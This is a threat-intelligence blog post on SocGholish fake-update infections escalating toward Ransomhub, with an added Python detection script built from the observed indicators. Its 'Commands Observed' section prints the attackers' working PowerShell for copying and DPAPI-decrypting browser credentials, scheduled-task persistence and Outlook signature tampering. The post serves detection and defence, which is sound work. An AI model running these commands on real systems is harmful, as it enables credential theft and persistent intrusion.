SocGholish Malware: Recent Trends and Effective Detection Strategies

Written by Taylor Jacobson | May 1, 2025 7:18:59 PM

You may be familiar with SocGholish (MITRE S1124), a malicious fake browser update used to spread malware through JavaScript downloads. Blumira has been following this malware for some time, and this walkthrough summarizes our recent observations based on detections and logs from our agent on a single lab device.

Overview & Background

Early in 2025, we began to see a recurrence of suspicious file executions. These were the outcome of users downloading fake updates from compromised websites, silently giving an attacker initial access. When users downloaded and executed these fake updates, they unknowingly launched malware on their systems. Fortunately, we observed several customers whose layered security measures automatically intercepted and blocked these attacks, halting any further exploitation. One particularly notable exploit caught our attention: after installation, it remained dormant for a brief period before exhibiting clear indicators of early-stage ransomware activity. Thankfully, all organizations that we observed in these cases were promptly alerted and able to respond in a timely and effective manner to contain and eradicate the attackers. On reviewing the attack chains, the observed activity closely resembled a new campaign of SocGholish malware leading to Ransomhub ransomware execution.

SocGholish has been active since 2017 and is operated by the initial access broker (IAB) Mustard Tempest (TA569). The malware has been extensively documented as it has evolved over time. Its use of “watering hole” (drive-by compromise) attacks for initial access has been very effective, making it a popular malware. Many users never even realize they downloaded fake updates from a compromised website. In fact, the Center for Internet Security noted that it was the top observed malware in Q4 of 2024 (CIS Blog).

Identifying the Attack

Initially, we observed malicious JavaScript executions (MITRE T1059.007) containing SocGholish payloads. Our detections generated findings based on known suspicious file executions, alerting on the JavaScript files’ behaviors and allowing customers to act quickly on the infections before they spread. These files did not show as malicious when checked against VirusTotal at the time of the alerts, but they were communicating with a “.top” domain and known malicious IP infrastructure. Companies that had additional controls like DNS filtering in place had quick and often automated response actions for these initial access attacks: files were either killed or quarantined, or the communicating domains were blocked immediately. This allowed customers to respond with some peace of mind.

While SocGholish typically steals information, installs remote access tools, and occasionally leads to ransomware, we observed a particularly concerning case. A JavaScript file with unique characteristics was downloaded and executed, triggering a chain of increasingly suspicious activities. Although the file immediately generated an alert, it was initially dismissed as benign (demonstrating how effective these types of watering-hole attacks can be). 

The first interesting observation was that this file was an ‘Update[.]js’ download (similar to the file names previously observed), but its name was disguised with a homoglyph (the raw filename actually reads as ‘Updаte.js’). Homoglyph attacks use special characters (or visually similar characters from other languages) to spoof text that appears normal to human readers while bypassing security filters that would otherwise trigger an alert or response (VirusTotal Link). Additionally, this file has a reputation for using “long sleeps,” a technique by which malware avoids sandboxing and evades antivirus: it delays activation (lying dormant) for a period of time before beginning to carry out any objectives.

In this case, the alert was closed as benign. About 18 hours later, additional suspicious activity started generating alerts on the same host. This delay lines up with the “long sleeps” tactic, and after this dormancy, reconnaissance activity began. Alerts for ADFind (MITRE T1087.002) and Nltest (MITRE T1482) were promptly triggered, minutes apart on the same host. These sequential alerts signaled an evolving attack chain and promptly notified the customer, who isolated the compromised host and took response measures before any data exfiltration or ransomware execution could occur. This rapid intervention and mitigation were crucial in preventing a potentially devastating breach.

We observed additional maneuvers following the ADFind and Nltest activity that were particularly interesting. There was a new communicating domain (VirusTotal Link), not previously seen, unlike the “.top” domains. We then saw network connections from pythonw.exe, which had been downloaded, unpacked into, and executed from the ProgramData folder. These connections communicated with the now-known Ransomhub Python C2 infrastructure (VT IP Link), which, at the time of this exploit, did have malicious reputations on VirusTotal. Amid this activity, PowerShell commands ran that first created scheduled tasks for persistence and then attempted to dump and decrypt credentials from browsers, saving them to a rad<5-hex-chars>.tmp file (MITRE Link).

In their Threat Detection Report, RedCanary noted a specific "activity cluster" that involved SocGholish intrusions leading to Ransomhub activity. The attack chain is remarkably similar to what is reported in this TrendMicro article, which was published after this particular attack. This additional "activity cluster" also noted credential harvesting via NTLM hashes, using a PowerShell command that looks for Outlook signature files and adds HTML code, including a link to an image file hosted in the attacker's infrastructure (NCC Group Article Link). According to RedCanary, "Once in place, when someone opens an email from the affected user...the recipient's email client may attempt to authenticate to the adversary infrastructure...enabling the adversary to harvest hashed credentials." A PowerShell command was also observed (MITRE T1187) related to this forced authentication/credential harvesting through Outlook.

Aligning with threat intelligence on SocGholish, each of these attacks spanned different industries. An initial access broker targeting a wide variety of sectors, accounting for over half of the observed malware in the last quarter, seems to be teaming up with a young though already notorious ransomware group. As threat actors evolve, details like these help inform detection development and improve security postures. Shortly after observing this last set of alerts, TrendMicro released their report, which documents the same attack chain as it worsened for victims, attributing the escalated activity to Ransomhub ransomware. Thankfully, the customers for whom we observed this activity did not experience the same ending, thanks to Blumira detections and alerts or to layered security controls that were already in place.

Commands Observed

Outlook Signature File Manipulation:
"C:\Windows\System32\cmd.exe" /C powershell -Command "Get-ChildItem "$env:APPDATA\Microsoft\Signatures\*.htm" | ForEach-Object {$content = Get-Content -Raw $_.FullName; $updatedContent = $content -replace '', ''; Set-Content -Path $_.FullName -Value $updatedContent}" > "C:\Users\\AppData\Local\Temp\rad862D0.tmp"
Python Setup and Scheduled Task Creation:
powershell -c "Expand-Archive -LiteralPath c:\programdata\python3.12.zip -DestinationPath c:\programdata;ls c:\programdata\python3.12"
"C:\Windows\System32\cmd.exe" /C powershell -c "$randomName='Task_' + ([guid]::NewGuid().ToString().Substring(0,8)); $a=New-ScheduledTaskAction -WorkingDirectory 'c:\programdata\python3.12' -Execute 'pythonw.exe'; $t=New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1); $s=New-ScheduledTaskSettingsSet -DontStopIfGoingOnBatteries -ExecutionTimeLimit '00:00:00' -AllowStartIfOnBatteries; Register-ScheduledTask -TaskName $randomName -Action $a -Trigger $t -Settings $s" > "C:\Users\\AppData\Local\Temp\rad72663.tmp"
Browser Credential Access:
"C:\Windows\System32\cmd.exe" /C powershell -c cat \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*\\logins.json\" > "C:\Users\\AppData\Local\Temp\radBB236.tmp"
"C:\Windows\System32\cmd.exe" /C powershell -c ls "C:\Users\\AppData\Local\Google\Chrome\'User Data'\*\'Login Data*'" > "C:\Users\\AppData\Local\Temp\radBB236.tmp"
"C:\Windows\System32\cmd.exe" /C powershell -c ls "C:\Users\\AppData\Local\Microsoft\Edge\'User Data'\*\'Login Data*'" > "C:\Users\\AppData\Local\Temp\radBB236.tmp"
"C:\Windows\System32\cmd.exe" /C powershell -c "$tmp=[System.IO.Path]::GetTempFileName();Get-Content -Raw -Encoding Byte \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data\" | Set-Content -Encoding Byte $tmp; Write-Output $tmp" > "C:\Users\\AppData\Local\Temp\radBB236.tmp"
"C:\Windows\System32\cmd.exe" /C powershell -c "$tmp=[System.IO.Path]::GetTempFileName();Get-Content -Raw -Encoding Byte \"$env:LOCALAPPDATA\\microsoft\\edge\\User Data\\Default\\Login Data\" | Set-Content -Encoding Byte $tmp; Write-Output $tmp" > "C:\Users\\AppData\Local\Temp\radBB236.tmp"
"C:\Windows\System32\cmd.exe" /C powershell -c "$2=((gc "C:\Users\\AppData\Local\Google\Chrome\'User Data'\'Local State'").split(',')-replace'app_bound_encrypted_key',''|sls encrypted_key)-replace'\"}','' -replace'\"encrypted_key\":\"','' -replace'\"os_crypt\":{','';$3=[System.Convert]::FromBase64String($2);$3=$3[5..($3.length-1)];Add-Type -AssemblyName System.Security;[System.Security.Cryptography.ProtectedData]::Unprotect($3,$null,[Security.Cryptography.DataProtectionScope]::CurrentUser)" > "C:\Users\\AppData\Local\Temp\radBB236.tmp"
"C:\Windows\System32\cmd.exe" /C powershell -c "$2=((gc "C:\Users\\AppData\Local\Microsoft\Edge\'User Data'\'Local State'").split(',')-replace'app_bound_encrypted_key',''|sls encrypted_key)-replace'\"}','' -replace'\"encrypted_key\":\"','' -replace'\"os_crypt\":{','';$3=[System.Convert]::FromBase64String($2);$3=$3[5..($3.length-1)];Add-Type -AssemblyName System.Security;[System.Security.Cryptography.ProtectedData]::Unprotect($3,$null,[Security.Cryptography.DataProtectionScope]::CurrentUser)" > "C:\Users\\AppData\Local\Temp\radBB236.tmp"
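As an added example (not code from the original post or from Blumira), the following Python script turns the homoglyph observation and the commands listed above into detection logic: it flags script file names whose letters mix Unicode scripts, as the ‘Updаte.js’ download did, matches process command lines against patterns taken from the commands observed (rad<hex>.tmp output files, pythonw.exe staged under ProgramData, a GUID-named scheduled task, browser login stores, DPAPI Unprotect calls, Outlook signature edits, ADFind/Nltest), and groups distinct hits per host so an escalating chain on one machine stands out. The host names, log lines and rule names are constructed for the example.

```python
import re
import unicodedata
from collections import defaultdict

# Rule regexes built from the command patterns observed in the post; rule names
# are this example's own. Each is searched case-insensitively over a command line.
RULES = {
    "rad_tmp_output_redirect": r"\\Temp\\rad[0-9A-Fa-f]{5}\.tmp",
    "pythonw_from_programdata": r"programdata.*pythonw\.exe|pythonw\.exe.*programdata",
    "guid_named_scheduled_task": r"NewGuid\(\).*Register-ScheduledTask",
    "browser_login_store_read": r"Login Data|logins\.json",
    "dpapi_unprotect": r"ProtectedData\]::Unprotect",
    "outlook_signature_edit": r"Signatures\\\*\.htm",
    "ad_recon_tool": r"\b(?:adfind|nltest)(?:\.exe)?\b",
}
SCRIPT_FILE = re.compile(r"[^\s\"'<>|]+\.(?:js|jse|vbs|wsf)\b", re.I)

def letter_scripts(name: str) -> set:
    """Unicode script of every letter in a name, e.g. {'LATIN', 'CYRILLIC'}."""
    return {unicodedata.name(c, "UNKNOWN").split()[0] for c in name if c.isalpha()}

def is_homoglyph_name(path: str) -> bool:
    """True when the basename mixes scripts, as 'Upd\u0430te.js' (Cyrillic a) does."""
    return len(letter_scripts(path.rsplit("\\", 1)[-1])) > 1

def analyze(event: dict) -> list:
    """Return the names of every rule a single process-creation event triggers."""
    cmd = event["cmdline"]
    hits = [name for name, rx in RULES.items() if re.search(rx, cmd, re.I)]
    if any(is_homoglyph_name(f) for f in SCRIPT_FILE.findall(cmd)):
        hits.append("homoglyph_script_filename")
    return hits

def triage(events: list) -> dict:
    """Distinct rule hits per host; several distinct hits on one host signal a chain."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]].update(analyze(ev))
    return {host: sorted(hits) for host, hits in per_host.items() if hits}

# Constructed sample process-creation events modelled on the post (not real logs).
SAMPLE_EVENTS = [
    {"host": "WS01", "cmdline": 'wscript.exe "C:\\Users\\alice\\Downloads\\Upd\u0430te.js"'},
    {"host": "WS01", "cmdline": "nltest /dclist:corp.local"},
    {"host": "WS01", "cmdline": "powershell -c \"$n='Task_' + ([guid]::NewGuid().ToString()"
     ".Substring(0,8)); $a=New-ScheduledTaskAction -WorkingDirectory 'c:\\programdata\\python3.12'"
     " -Execute 'pythonw.exe'; Register-ScheduledTask -TaskName $n -Action $a\""
     ' > "C:\\Users\\alice\\AppData\\Local\\Temp\\rad72663.tmp"'},
    {"host": "WS02", "cmdline": "powershell -c Get-ChildItem C:\\Users\\bob\\Documents"},
]
```

Running `triage(SAMPLE_EVENTS)` reports five distinct rule hits for WS01 and nothing for WS02; in practice the per-host grouping is what separates the 18-hour-delayed recon and persistence activity from a single benign-looking alert.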

MITRE ATT&CK Tactics and Techniques

Initial Access [TA0001]
  • Drive-by Compromise [T1189]
Execution [TA0002]
  • Command and Scripting Interpreter [T1059]
    • JavaScript [T1059.007]
Persistence [TA0003]
  • Scheduled Task/Job [T1053]
    • Scheduled Task [T1053.005]
* Defense Evasion [TA0005] (This was inferred through VirusTotal reputations, not directly observed via malware analysis.)
  • Virtualization/Sandbox Evasion [T1497]
    • Time Based Evasion [T1497.003]
Credential Access [TA0006]
  • Credentials from Password Stores [T1555]
    • Credentials from Web Browsers [T1555.003]
  • Forced Authentication [T1187]
Discovery [TA0007]
  • Account Discovery [T1087]
    • Domain Account [T1087.002]
  • System Information Discovery [T1082]
Command and Control [TA0011]
  • Application Layer Protocol [T1071]
    • Web Protocols [T1071.001]

IOC list:
